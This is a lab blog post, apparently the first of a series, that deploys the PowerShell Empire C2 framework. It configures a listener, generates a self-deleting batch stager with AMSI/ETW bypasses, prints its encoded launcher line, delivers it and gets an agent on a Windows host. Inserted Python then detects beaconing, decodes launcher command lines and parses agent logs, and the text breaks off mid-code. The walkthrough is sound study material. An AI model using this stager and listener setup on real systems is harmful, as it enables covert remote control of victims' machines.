Wednesday, February 2, 2022

Beginning Powershell Empire - The Attack in 10 steps

In this 5-part series, I'm learning more about PowerShell Empire from the perspectives of using the tool, analyzing the logs that get created, and analyzing the packets as they traverse the network.

1. Setup PowerShell Empire

First, checking what services are currently listening on my local device.

┌──(root💀securitynik)-[~]
└─# ss --numeric --listening --tcp 
State        Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process   

Next, I'm going to clear the database to remove any artifacts from before.

┌──(root💀securitynik)-[~/packets]
└─# powershell-empire server --reset
[*] Loading default config
[>] Would you like to reset your Empire instance? [y/N]: y
cp: cannot stat './powershell/Invoke-Obfuscation': No such file or directory
[*] Setting up database.
[*] Adding default user.
[*] Adding database config.
[*] Generating random staging key
[*] Adding default bypasses.
[*] Adding default keyword obfuscation functions.

Loading up the server side of PowerShell Empire using the default configuration.

┌──(root💀securitynik)-[~/packets]
└─# powershell-empire server --debug --config /etc/powershell-empire/config.yaml --restip 0.0.0.0 --socketport 9999 --username securitynik --password Testing1
Loading config from /etc/powershell-empire/config.yaml
[*] Loading stagers from: /usr/share/powershell-empire/empire/server/stagers/
[*] Loading modules from: /usr/share/powershell-empire/empire/server/modules/
[*] Loading listeners from: /usr/share/powershell-empire/empire/server/listeners/
[*] Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles
[*] Searching for plugins at /usr/share/powershell-empire/empire/server/plugins
[*] Plugin csharpserver found.
[*] Initializing plugin...
[*] Doing custom initialization...
[*] Loading Empire C# server plugin
[*] Registering plugin with menu...
[*] Empire starting up...
Username updated
Password updated
[*] Starting Empire RESTful API on 0.0.0.0:1337
[*] Starting Empire SocketIO on 0.0.0.0:9999
[*] Testing APIs
[+] Empire RESTful API successfully started
[+] Empire SocketIO successfully started
[*] Cleaning up test user
Server >
EMPIRE TEAM SERVER | 0 Agent(s) | 0 Listener(s) | 1 Plugin(s)   

Verifying that the server is now listening.

┌──(root💀securitynik)-[~]
└─# ss --numeric --listening --tcp
State            Recv-Q           Send-Q                       Local Address:Port                       Peer Address:Port           Process           
LISTEN           0                128                                0.0.0.0:9999                            0.0.0.0:*                                
LISTEN           0                128                                0.0.0.0:1337                            0.0.0.0:*                      

With the server listening, time to connect the client.

┌──(root💀securitynik)-[~]
└─# powershell-empire client
[*] Loading default config
...

Use the 'connect' command to connect to your Empire server.
'connect -c localhost' will connect to a local empire instance with all the defaults
including the default username and password.
[*] Attempting to connect to server: localhost
[!] Invalid username and/or password
(Empire) >

Now that we are in the Empire environment, time to connect to the server.

To get help while connecting, in the client console:
(Empire) > connect --help
(Empire) > connect https://10.0.0.107 --port=1337 --socketport=9999 --username=securitynik --password=Testing1

========================================================================================
 [Empire] Post-Exploitation Framework
========================================================================================
 [Version] 4.0.2 BC Security Fork | [Web] https://github.com/BC-SECURITY/Empire
========================================================================================
 [Starkiller] Multi-User GUI | [Web] https://github.com/BC-SECURITY/Starkiller
========================================================================================

   _______   ___  ___   ______    __   ______        _______
  |   ____| |   \/   | |   _  \  |  | |   _  \      |   ____|
  |  |__    |  \  /  | |  |_)  | |  | |  |_)  |     |  |__
  |   __|   |  |\/|  | |   ___/  |  | |      /      |   __|
  |  |____  |  |  |  | |  |      |  | |  |\  \----. |  |____
  |_______| |__|  |__| | _|      |__| | _| `._____| |_______|


       391 modules currently loaded

       0 listeners currently active

       0 agents currently active

[*] Connected to https://10.0.0.107
(Empire) >


Connected to https://10.0.0.107:1337. 0 agents. 1 unread messages. 

Looking at the server side of the communication, I see:

[+] securitynik connected to socketio

Further confirming that the client is connected to the server.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ss --numeric --tcp | grep --perl-regexp "9999|1337"
ESTAB 0      0         10.0.0.107:9999    10.0.0.107:41866       
ESTAB 0      0         10.0.0.107:41866   10.0.0.107:9999 

Good stuff. We're making progress. 

Checking to see which listeners are currently configured if any.

(Empire) > listeners

┌Listeners List──────┬───────────────────┬────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At │ Enabled │
└────┴──────┴────────┴───────────────────┴────────────┴─────────┘

None! Setting up my first listener by reviewing and configuring some of the available options.

(Empire: listeners) > uselistener http

(Empire: uselistener/http) > info

 Author       @harmj0y                                                              
 Description  Starts a http[s] listener (PowerShell or Python) that uses a GET/POST 
              approach.                                                             
 Name         HTTP[S] 


 (Empire: uselistener/http) > set Cookie SecurityNik-HTTP-Listener-Cookie
[*] Set Cookie to SecurityNik-HTTP-Listener-Cookie

(Empire: uselistener/http) > set KillDate 11/22/2021
[*] Set KillDate to 11/22/2021

(Empire: uselistener/http) > set UserAgent SecurityNik-HTTP-Listener-User-Agent
[*] Set UserAgent to SecurityNik-HTTP-Listener-User-Agent

(Empire: uselistener/http) > set WorkingHours 00:00-23:59
[*] Set WorkingHours to 00:00-23:59

[*] Set BindIP to 10.0.0.107
(Empire: uselistener/http) >

(Empire: uselistener/http) > set Port 443
[*] Set Port to 443


(Empire: uselistener/http) > set DefaultDelay 60
[*] Set DefaultDelay to 60

I changed the default delay / reachback from 5 seconds to 60 seconds, as I did not want too much noise in the packet capture.

Revisiting the configured options:

(Empire: uselistener/http) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ BindIP           │ 10.0.0.107                          │ True     │ The IP to bind to on the control    │
│                  │                                     │          │ server.                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CertPath         │                                     │ False    │ Certificate path for https          │
│                  │                                     │          │ listeners.                          │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cookie           │ SecurityNik-HTTP-Listener-Cookie    │ False    │ Custom Cookie Name                  │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultDelay     │ 60                                  │ True     │ Agent delay/reach back interval (in │
│                  │                                     │          │ seconds).                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultJitter    │ 0.0                                 │ True     │ Jitter in agent reachback interval  │
│                  │                                     │          │ (0.0-1.0).                          │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultLostLimit │ 60                                  │ True     │ Number of missed checkins before    │
│                  │                                     │          │ exiting                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DefaultProfile   │ /admin/get.php,/news.php,/login/pro │ True     │ Default communication profile for   │
│                  │ cess.php|Mozilla/5.0 (Windows NT    │          │ the agent.                          │
│                  │ 6.1; WOW64; Trident/7.0; rv:11.0)   │          │                                     │
│                  │ like Gecko                          │          │                                     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Headers          │ Server:Microsoft-IIS/7.5            │ True     │ Headers for the control server.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Host             │ http://10.0.0.107                   │ True     │ Hostname/IP for staging.            │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KillDate         │ 11/22/2021                          │ False    │ Date for the listener to exit       │
│                  │                                     │          │ (MM/dd/yyyy).                       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Launcher         │ powershell -noP -sta -w 1 -enc      │ True     │ Launcher string.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Name             │ http                                │ True     │ Name for the listener.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Port             │ 443                                 │ True     │ Port for the listener.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SlackURL         │                                     │ False    │ Your Slack Incoming Webhook URL to  │
│                  │                                     │          │ communicate with your Slack         │
│                  │                                     │          │ instance.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerURI        │                                     │ False    │ URI for the stager. Must use        │
│                  │                                     │          │ /download/. Example:                │
│                  │                                     │          │ /download/stager.php                │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagingKey       │ ?4M6q)cLnvli}UCsu:rwf![~]79{#=O/    │ True     │ Staging key for initial agent       │
│                  │                                     │          │ negotiation.                        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-HTTP-Listener-User-     │ False    │ User-agent string to use for the    │
│                  │ Agent                               │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ WorkingHours     │ 00:00-23:59                         │ False    │ Hours for the agent to operate      │
│                  │                                     │          │ (09:00-17:00).                      │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘
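The options above hand a defender concrete indicators: the DefaultProfile URIs and Trident user agent the agent will use for its check-ins, and a check-in every 60 seconds with 0.0 jitter. As an added example (not from this post or from Empire), the Python below applies both checks to constructed proxy log lines in a hypothetical `<ts> <src> <dst:port> <method> <uri> "<ua>"` format.

```python
"""Flag Empire-style HTTP beaconing in proxy logs (added example, not Empire code).

Two signals are checked, both taken from the listener options above:
  * requests to the DefaultProfile URIs carrying the default Trident user agent
  * a fixed check-in cadence (DefaultDelay 60, DefaultJitter 0.0)
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Values copied from the Empire listener "options" output (DefaultProfile).
DEFAULT_PROFILE_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
DEFAULT_PROFILE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Hypothetical proxy log format:  <ts> <src> <dst>:<port> <method> <uri> "<ua>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) (?P<uri>\S+) "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec

def profile_matches(rec):
    """True when URI and User-Agent both match Empire's default HTTP profile."""
    return rec["uri"] in DEFAULT_PROFILE_URIS and rec["ua"] == DEFAULT_PROFILE_UA

def beacon_score(timestamps):
    """Return (mean_interval_s, coefficient_of_variation) for a sorted list of
    timestamps, or None with fewer than three requests (two intervals needed)."""
    if len(timestamps) < 3:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    mean = statistics.fmean(gaps)
    if mean == 0:
        return None
    return mean, statistics.pstdev(gaps) / mean

def find_beacons(lines, max_cv=0.05):
    """Group requests per (src, dst) and report pairs that hit the default
    profile or check in at a near-constant interval (CV at or below max_cv).
    With jitter 0.0 the CV of a healthy beacon is essentially zero."""
    by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_pair[(rec["src"], rec["dst"])].append(rec)
    findings = []
    for (src, dst), recs in by_pair.items():
        recs.sort(key=lambda r: r["ts"])
        reasons = []
        hits = sum(profile_matches(r) for r in recs)
        if hits:
            reasons.append(f"{hits} request(s) match default Empire HTTP profile")
        score = beacon_score([r["ts"] for r in recs])
        if score and score[1] <= max_cv:
            reasons.append(f"fixed cadence ~{score[0]:.0f}s (CV {score[1]:.3f})")
        if reasons:
            findings.append({"src": src, "dst": dst, "requests": len(recs), "reasons": reasons})
    return findings

# Constructed sample: one host checking in every 60 s with the default profile,
# one host browsing normally.
SAMPLE_LOG = """\
2021-11-20 13:40:10 10.0.0.110 10.0.0.107:443 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-11-20 13:40:12 10.0.0.55 93.184.216.34:443 GET /index.html "Mozilla/5.0 (X11; Linux x86_64) Firefox/94.0"
2021-11-20 13:41:10 10.0.0.110 10.0.0.107:443 GET /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-11-20 13:41:57 10.0.0.55 93.184.216.34:443 GET /about.html "Mozilla/5.0 (X11; Linux x86_64) Firefox/94.0"
2021-11-20 13:42:10 10.0.0.110 10.0.0.107:443 GET /login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-11-20 13:43:10 10.0.0.110 10.0.0.107:443 POST /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-11-20 13:47:03 10.0.0.55 93.184.216.34:443 GET /contact.html "Mozilla/5.0 (X11; Linux x86_64) Firefox/94.0"
"""

if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG.splitlines()):
        print(f"{f['src']} -> {f['dst']} ({f['requests']} requests): " + "; ".join(f["reasons"]))
```

Raising DefaultJitter would spread the intervals and defeat the cadence check, which is why the profile match is kept as an independent signal.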

With the above configured, I then run execute to start the Listener.

(Empire: uselistener/http) > execute
[+] Listener http successfully started

On the server side, the following was seen:

[*] Starting listener 'http'
[+] Listener successfully started!
Server >

EMPIRE TEAM SERVER | 0 Agent(s) | 1 Listener(s) | 1 Plugin(s)    

Running the listeners command again, this time I see:

(Empire: uselistener/http) > listeners

┌Listeners List──────┬───────────────────┬──────────────────────────────────────────┬─────────┐
│ ID │ Name │ Module │ Listener Category │ Created At                               │ Enabled │
├────┼──────┼────────┼───────────────────┼──────────────────────────────────────────┼─────────┤
│ 1  │ http │ http   │ client_server     │ 2021-11-20 12:35:47 EST (48 seconds ago) │ True    │
└────┴──────┴────────┴───────────────────┴──────────────────────────────────────────┴─────────┘

Further confirming there is a listener on port 443.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ss --numeric --tcp --listening 
State         Recv-Q        Send-Q               Local Address:Port               Peer Address:Port       Process        
LISTEN        0             128                        0.0.0.0:9999                    0.0.0.0:*                         
LISTEN        0             128                        0.0.0.0:1337                    0.0.0.0:*                         
LISTEN        0             128                     10.0.0.107:443                     0.0.0.0:*   

With the listener configured, next up, selecting a stager. 

I selected windows/launcher_bat. This creates a self-deleting batch file.

(Empire: listeners) > usestager windows/launcher_bat

(Empire: usestager/windows/launcher_bat) > set Listener http
[*] Set Listener to http

(Empire: usestager/windows/launcher_bat) > set OutFile welcome.bat
[*] Set OutFile to welcome.bat

(Empire: usestager/windows/launcher_bat) > set UserAgent securitynik-launcher-bat-User-Agent
[*] Set UserAgent to securitynik-launcher-bat-User-Agent

Reviewing the configured options:

(Empire: usestager/windows/launcher_bat) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Delete           │ True                                │ False    │ Switch. Delete .bat after running.  │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Language         │ powershell                          │ True     │ Language of the stager to generate. │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ True     │ Listener to generate stager for.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ OutFile          │ welcome.bat                         │ False    │ Filename that should be used for    │
│                  │                                     │          │ the generated output, otherwise     │
│                  │                                     │          │ returned as a string.               │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ StagerRetries    │ 0                                   │ False    │ Times for the stager to retry       │
│                  │                                     │          │ connecting.                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ securitynik-launcher-bat-User-Agent │ False    │ User-agent string to use for the    │
│                  │                                     │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

With everything in place, time to generate the welcome.bat file.

(Empire: usestager/windows/launcher_bat) > generate
[*] welcome.bat written to /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat

Copy the file to the /tmp folder.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# cd /tmp/

┌──(root💀securitynik)-[/tmp]
└─# cp /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat .

┌──(root💀securitynik)-[/tmp]
└─# ls -l welcome.bat 
-rw-r--r-- 1 root root 4009 Nov 20 12:45 welcome.bat

Looking at the folders in the powershell-empire path.

┌──(root💀securitynik)-[/tmp]
└─# ls /var/lib/powershell-empire/
data  empire  empire.db  empire.debug  LastTask

Curious about what is in the empire.db file so far, I run strings against it and see ...

┌──(root💀securitynik)-[/tmp]
└─# strings /var/lib/powershell-empire/empire.db | more

SQLite format 3
]3
securitynik$2b$12$uoR.NXYK98MnTFe1kWuqGOoTvRYiuhoDys2f65.Ywq9bHDVNeU40Wlffg4uuayna6os6iur3ua46t9um0ylp7hc4k8ufm2021-11-20
 17:18:31
^3httphttpclient_server
Name
Description
Name for the listener.
Required
Value
http
SuggestedValues
Strict
Host
Hostname/IP for staging.
http://10.0.0.107:443
BindIP
(The IP to bind to on the control server.
10.0.0.107

... TRUNCATED FOR BREVITY ...

Looking at a snapshot of the content of the welcome.bat file.

┌──(root💀securitynik)-[/tmp]
└─# cat welcome.bat 
# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBmAC4ARwBF... TRUNCATED FOR BREVITY ... YQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
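The second line of welcome.bat is exactly what shows up in process-creation telemetry (Sysmon Event ID 1 or Security event 4688) when the stager runs: a `powershell -noP -sta -w 1 -enc <base64>` command line whose payload is base64 of UTF-16LE text, written with random casing and string-split type names such as `'Amsi'+'Utils'` that defeat naive string matching. As an added example (not from this post or from Empire), the Python below decodes such a command line and scores it; the encoded sample is constructed inside the script and only echoes a string, it is not the launcher from welcome.bat.

```python
"""Decode and triage a PowerShell "-enc" launcher from a process command line.

Added example, not Empire's code. The decoded script is lower-cased and
adjacent single-quoted strings are joined ('Amsi'+'Utils' -> 'AmsiUtils')
before indicator matching, so random casing and string splitting do not hide it.
"""
import base64
import re
import shlex

# Flag spellings seen in this post plus their long forms (exact, case-insensitive).
SUSPICIOUS_FLAGS = {"-nop": "NoProfile", "-noprofile": "NoProfile",
                    "-nol": "NoLogo", "-nologo": "NoLogo",
                    "-w": "WindowStyle", "-windowstyle": "WindowStyle",
                    "-sta": "STA", "-ep": "ExecutionPolicy",
                    "-executionpolicy": "ExecutionPolicy"}

# Regexes checked against the normalised (lower-cased, de-concatenated) script.
INDICATORS = {
    "amsi_type_lookup": r"system\.management\.automation\.amsiutils",
    "reflection_gettype": r"\[ref\]\.assembly\.gettype\(",
    "invoke_expression": r"\biex\b|invoke-expression",
    "version_gate": r"\$psversiontable\.psversion\.major",
}

def extract_encoded_command(cmdline):
    """Return the base64 argument following -enc (PowerShell accepts any prefix
    of -EncodedCommand, any case), or None. shlex is an approximation of
    Windows argument parsing, adequate for pulling flags out."""
    toks = shlex.split(cmdline, posix=True)
    for i, tok in enumerate(toks[:-1]):
        low = tok.lower()
        if low.startswith("-e") and "-encodedcommand".startswith(low):
            return toks[i + 1]
    return None

def decode_encoded_command(b64):
    """Base64 -> UTF-16LE text; None if it does not decode cleanly."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

CONCAT_RE = re.compile(r"'\s*\+\s*'")   # joins 'Amsi'+'Utils' into 'AmsiUtils'

def normalise(script):
    """Lower-case and collapse adjacent single-quoted string concatenations."""
    return CONCAT_RE.sub("", script).lower()

def triage(cmdline):
    """Describe a command line: flags used, decoded script, indicators found and
    a simple score (distinct flags + indicators)."""
    result = {"flags": [], "decoded": None, "indicators": [], "score": 0}
    for tok in shlex.split(cmdline, posix=True):
        name = SUSPICIOUS_FLAGS.get(tok.lower())
        if name:
            result["flags"].append(name)
    encoded = extract_encoded_command(cmdline)
    if encoded:
        result["flags"].append("EncodedCommand")
        script = decode_encoded_command(encoded)
        if script is not None:
            result["decoded"] = script
            norm = normalise(script)
            result["indicators"] = [k for k, rx in INDICATORS.items() if re.search(rx, norm)]
    result["score"] = len(set(result["flags"])) + len(result["indicators"])
    return result

def build_sample_launcher(script):
    """Encode plaintext the way the launcher does (UTF-16LE, then base64).
    Used only to construct the sample below."""
    return "powershell -noP -sta -w 1 -enc " + base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample: mimics the casing and string-splitting style of the
# decoded launcher in the post, but only echoes a string.
SAMPLE_SCRIPT = ("If($PSVeRsIoNTaBlE.PSVeRsIoN.MaJoR -gE 3){"
                 "$REF=[ReF].AsSeMbLy.GeTtYpE('System.Management.Automation.Amsi'+'Utils')};"
                 "'constructed sample'|IEX")
SAMPLE_CMDLINE = build_sample_launcher(SAMPLE_SCRIPT)

if __name__ == "__main__":
    r = triage(SAMPLE_CMDLINE)
    print("flags:", sorted(set(r["flags"])))
    print("indicators:", r["indicators"], "score:", r["score"])
    print("decoded:", r["decoded"])
```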

Interesting! Time to get this file to the target system. Setting up a Python SimpleHTTPServer.

┌──(root💀securitynik)-[/tmp]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

2. Gaining Access

To gain access, we have to get the welcome.bat file to the user, or influence the user to download and/or open it. Using the browser, I'm going to download and execute the file.

Below shows the file being downloaded:

┌──(root💀securitynik)-[/tmp]
└─#  python -m SimpleHTTPServer 80 
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [20/Nov/2021 12:56:02] "GET / HTTP/1.1" 200 -
10.0.0.110 - - [20/Nov/2021 12:56:04] code 404, message File not found
10.0.0.110 - - [20/Nov/2021 12:56:04] "GET /favicon.ico HTTP/1.1" 404 -
10.0.0.110 - - [20/Nov/2021 12:56:10] "GET /welcome.bat HTTP/1.1" 200 -

With the file downloaded, once it is run, here is what we see on the client console of Powershell Empire:

[+] New agent E7ULVTA6 checked in
[*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110
(Empire: usestager/windows/launcher_bat) >

and on the server side of Empire ...

[*] Sending POWERSHELL stager (stage 1) to 10.0.0.110
[*] New agent E7ULVTA6 checked in
[+] Initial agent E7ULVTA6 from 10.0.0.110 now active (Slack)
[*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110

Listing the agents, I see ...

(Empire: usestager/windows/launcher_bat) > agents

┌Agents─────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name     │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼──────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ E7ULVTA6 │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:40:10 EST │ http     │
│    │          │            │             │                      │            │      │        │ (30 seconds ago)        │          │
└────┴──────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Renaming the agent to something more meaningful. 

(Empire: agents) > rename E7ULVTA6 SANS560WINlowpriv

Listing the agents, we see:

(Empire: agents) > list

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:43:22 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (18 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Interacting with the agent.

(Empire: agents) > interact SANS560WINlowpriv
(Empire: SANS560WINlowpriv) >

Now that we have an agent, a downloads folder has been created for that agent. There is also a file named LastTask.

┌──(root💀securitynik)-[/tmp]
└─# ls /var/lib/powershell-empire/
data  downloads  empire  empire.db  empire.debug  LastTask

In the downloads folder, there is a folder named SANS560WINlowpriv, which represents the agent. Here is what gets written to the file once the agent gets registered.

┌──(root💀securitynik)-[/tmp]
└─# cat /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log | more

2021-11-20 13:04:03 : 

[*] Agent info:
  ID                    1
  session_id            E7ULVTA6
  listener              http
  name                  E7ULVTA6
  language              powershell
  language_version      5
  delay                 60
  jitter                0.0
  external_ip           10.0.0.110
  internal_ip           10.0.0.110
  username              SEC560STUDENT\sec560
  high_integrity        0
  process_name          powershell
  process_id            3600
  hostname              SEC560STUDENT
  os_details            Microsoft Windows 10 Enterprise
  session_key           EXaWl+/do>Rk8ef2g`[^$t7D}Oywz\NC
  nonce                 2658109564916705
  checkin_time          2021-11-20 18:04:02+00:00
  lastseen_time         2021-11-20 18:04:03+00:00
  parent                None
  children              None
  servers               None
  profile               /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT
                                6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  kill_date             11/22/2021
  working_hours         00:00-23:59
  lost_limit            60

[+] Agent E7ULVTA6 now active:


2021-11-20 13:43:22 : 
[*] Agent renamed from E7ULVTA6 to SANS560WINlowpriv

Moving forward, I will be tailing this file as follows, to see what is written as the tasks are executed.

┌──(root💀securitynik)-[/tmp]
└─# tail --follow --lines 0 /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log 
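The agent.log shown above has a simple structure: each entry opens with a `YYYY-MM-DD HH:MM:SS : ` header line, a tasking entry reads `tasked agent <id> to run command|module <what>`, and the entry that follows it is normally the result. As an added example (not from this post or from Empire), the Python below parses that format into a task timeline, pairing each tasking with its result and recording renames; the sample log is constructed from entries reproduced later in this post. The tasking-to-result latency it computes is bounded by the agent's check-in delay (60 seconds here), so a seized or backed-up agent.log also reveals the beacon interval.

```python
"""Parse an Empire agent.log into a task timeline (added example, not Empire code).

Blocks are delimited by header lines "YYYY-MM-DD HH:MM:SS : "; everything up to
the next header is the block body. A body starting with
"tasked agent <id> to run command|module <what>" is a tasking, and the next
non-tasking block is taken as its result.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

HEADER_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) :\s*$")
TASK_RE = re.compile(r"^tasked agent (\S+) to run (command|module) (.+)$")
RENAME_RE = re.compile(r"^\[\*\] Agent renamed from (\S+) to (\S+)$")

@dataclass
class Block:
    ts: datetime
    text: str

@dataclass
class Task:
    tasked_at: datetime
    agent: str
    kind: str                 # "command" or "module"
    what: str
    result: Optional[str] = None
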